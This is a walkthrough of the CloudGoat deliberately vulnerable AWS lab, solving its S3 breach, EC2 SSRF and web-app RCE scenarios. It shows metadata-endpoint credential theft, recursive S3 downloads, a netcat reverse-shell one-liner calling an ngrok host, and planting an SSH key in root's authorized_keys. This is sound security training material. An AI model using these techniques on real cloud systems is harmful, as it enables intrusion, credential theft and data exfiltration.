16 KiB
AWS Cloud Goat
Cloud Goat is a AWS deployment container which is basically a CTF for teaching AWS absuses
Setting up Cloud Goat
Git clone the repo for cloud goat and, install the requirements and run
Cloud goat also requires Terraform
which is used for managing the cloud infrastructure through templates and policies through cli or through code
https://www.terraform.io/downloads
After downloading terraform, move it to /usr/bin/
and after that you can run cloudgoat.py
Before creating a scenario, we need to have a free tier AWS account and for that you do need to provide valid details reagrding the credit card but no amount will be deducted
Login as the root user on aws management console
After logging we need to create a user
On this user we need to set AdministratorAccess
policy
Skip the Add tags
option
After creating the user, We'll get AWS session and secret key
Now use awscli
to configure aws session for this user by creating a profile becuase this script will be using the AWS resources from our account so make to remove them after you are done with the scenarios
You may encounter an error where cloudgoat script may fail to install terraform-provider-archive
so to fix this issue manually download the binary and place it in /usr/bin
Cloud Breach s3 (Medium)
In this scenario we need to query the metadata of EC2 from a reverse proxy and access AWS session then using those keys we need to extract data from s3 bucket, so creating this scenario
To start attacking, we can get the IP address from the generated start.txt
file
Running an nmap scan (it isn't necessary) we can see that it's an ec2 instance
But it doesn't show anything on the web server
Making a request with curl
shows that it's configured to work as a proxy to make requests to ec2 metadata
AWS has an IP for metadata which is 169.254.169.254
, so we need to edit the Host header of the request and make a request to /latest
So we can make a request to /latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidkt0wpx0w0k
, which will show AWS access key
Adding a profile using these keys
We can verify the keys if they are working with
aws sts get-caller-identity --profile cloud_breach
Now we don't know what's the s3 bucket, we can list s3 buckets if it's associated with the AWS key
aws s3 ls --profile cloud_breach
To view contents of this s3 bucket we can list it by giving the bucket name which is cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k
aws s3 ls s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k --profile cloud_breach
To copy all files from s3 bucket we can use cp
to copy files, --recusrive
to copy all files .
for the the destination to be the current path
aws s3 --recursive cp s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k . --profile cloud_breach
Accessing any of these file mean that we have compromised s3 bucket which completes this scenario
We can now destory this challenege with python3 cloudgoat.py destroy cloud_breach_s3
EC2 SSRF (Medium)
In this scenario we have access to IAM user through which we have to enumerate permissions and find a lambda function through which we can access EC2 instance and extract data from s3 bucket
To create this scenario, we need to run python3 cloudgoat.py create ec2_ssrf
But at the end this will fail because python3.6 is not supported for creating lambda functions, we can fix it by replacing it with python3.9 by editing scenarios/ec2_ssrf/terraform/lambda.tf
Now running the script again to create the scenario
In start.txt
we havet the acount id and AWS access key for solus
IAM user
So let's create a profile for solus user with AWS keys
To verify if the AWS keys are working
aws sts get-caller-identity --profile solus
Listing lambda functions with
aws lambda list-functions --profile solus --region us-east-1
This reveals EC2 access key, to use them we need to create another profile for this access key, also if we try invoking this function it won't work
So creating aws profile
Running ec2 describe-instances
to view the instances associated with the access key
aws ec2 describe-instances --profile solus_ec2 --region us-east-1
Scrolling a little down we'll get the instance's IP address which will also reveal public IP
Running nmap scan on EC2 instance to see which ports are open
It has a web server running so let's visit that, the default page had some issues as the creator didn't handle the errors properly
We can resolve this by including url
GET parameter
As the page tells that this is about SSRF, we can try making a requesst to EC2 metadata on IP 169.254.169.254
Making a request to /latest/meta-data/iam/security-credentials/
we'll get the role cg-ec2-role-ec2_ssrf_cgidne4wv0ljch
for which we can get read the AWS keys
With aws configure
we can use the AWS keys to create a profile for ec2_ssrf
We also need to add the session token
To access s3 bucket, we first to list them with aws s3 ls --profile ec2_ssrf
Listing the contents of this bucket will shows us a text file
Downloading this file with cp
, we'll get AWS keys for another user which seems to be privileged from from the name of the text file
Checking this user's identitiy, it's shepard
Now invoking the function which we tried before with solus user but this time trying with shepard
aws lambda invoke --function-name cg-lambda-ec2_ssrf_cgidne4wv0ljch --profile ec2_ssrf_admin --region us-east-1 ./output.txt
Reading the response from the text file, we'll see that we completed this scenario
We can destory this scenario with cloudgoat.py destroy ec2_ssrf
RCE Web App (Hard)
In this scenario we have access to two IAM users and access s3 bucket which will lead to a vulnerable web app for rce
We can create this scenario with python3 cloudgoat.py create rce_web_app
But at the end it showed an error that it wasn't able to create RDS (Amazon Relational Database) DB instance because it couldn't find postgres 9.6 because that has been deprecated
This issue can be resolved by replacing the postgres version to 12
Here we have two users lara
and mcduck
, so first I'll take the path from lara
Path from Lara
Creating a profile for lara by using access and secret key
We can verfiy if the keys are working
From this IAM user we can access s3 bucket
aws s3 ls --profile lara
We can see there are three buckets but this user can access only cg-logs
bucket
To download cg-lb-logs
folder recursivley
aws s3 cp --recursive s3://cg-logs-s3-bucket-rce-web-app-cgid3ntl2q2i88 . --profile lara
On accessing that folder, there's a log file which contained some requests
Making a request to see these urls are alive but they were down
So we know there might be a web app running, we can try listing an ec2 instances through this profile
aws ec2 describe-instances --profile lara --region us-east-1
We scan this ec2 instance for open ports which shows that there's only ssh open the instance
So there's nothing we can do from the ec2, the log file belongs to a load balancer, so we can try lisiting the load balancers with elbv2 describe-load-balancers
aws elbv2 describe-load-balancers --profile lara --region us-east-1
We can visit this url and access the site
This talks about visiting "the secret url" which we can find from the logs
This gives us a functionality to execute commands which we can abuse to get a reverse shell
For reverse shell, we can use ngork
which is used for exposing local port over the internet, I was having issues with ngrok not working with kali linux so I swtiched to ubuntu for getting a shell using busybox variant of netcat
echo "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 0.tcp.ap.ngrok.io 11400 >/tmp/f" |base64 -w0
We can run ngrok with ngrok tcp 2222
But issue is when getting a reverse shell, the application stops responding
We can try accessing root's ssh key but it wasn't generated
Since we are root user, we can add our ssh public key and login with the private key
echo "ssh public key " > /root/.ssh/authorized_keys
On adding the key I was getting an error due to Unterminated quoted string
, I am not sure why I was getting that but I wasn't able to add the ssh key
If we check root's authorized_keys file, it says to login as ubuntu
Either the ssh key is being truncated for some reason or it needs a proper format for the key as AWS supports D25519
and 2048-bit
SSH-2 RSA keys for Linux instances, there is even an issue reported for this part
Generate the key again with ed25519
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG5QcNdp9tUZRQvmkPMDfZpXciiy+7YVTdNI9RyUPbcR arz@kali" > /root/.ssh/authorized_keys
We can see that this worked perfectly with no errors which means we can now login into the ec2 instance we found earlier
Having access to EC2, we can query for the metadata from the magic AWS IP 169.254.169.254
curl 169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-rce_web_app_cgidd9pk8lqvym
Using the keys we can create a new profile for aws session
With this user we can access the secrets s3 bucket and find db.txt
Downloading the file
From this file we'll get the credentials for database
DB instance can be found with rds describe-db-instances
aws rds describe-db-instances --profile rce_web --region us-east-1
This is an internal instance, so we need to access it from ec2
Database can be accessed with psql
psql -h cg-rds-instance-rce-web-app-cgidd9pk8lqvym.cvqhxg0xsdki.us-east-1.rds.amazonaws.com -U cgadmin -d cloudgoat
Lisiting the tables with \d
we have a table named sensitive_information
, so let's query the table with select * from sensitive_information
By having the secret password, the rce scenario will be completed
Path from McDuck
Using McDuck's aws keys
With this user we can try listing s3 buckets
Now with lara
we were only able to access the cg-logs
bucket but with mcduck
we can access cg-keystore
bucket
Downloading the public and private keys
From lara we arleady know the IP of the ec2 instance so we can login using ubuntu user through ssh
From here we could either get the keys from metdata or install awscli, access s3 bucket to get the credentials to the database, list the realation database instance and use postgresql client to access database, since we have sudo privileges we can become root user
apt install awscli
aws sts get-caller-identity
Accessing the s3 bucket to get database credentials
Now getting database instance's IP
aws rds describe-db-instances --region us-east-1
And with the credentials and database's instance we'll able to login and complete the scenario like we did with lara user.
References
- https://github.com/RhinoSecurityLabs/cloudgoat
- https://www.terraform.io/downloads
- https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/
- https://pentestbook.six2dez.com/enumeration/cloud/aws
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_PostgreSQL.html
- https://www.bluematador.com/learn/aws-cli-cheatsheet
- https://github.com/RhinoSecurityLabs/cloudgoat/issues/49
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql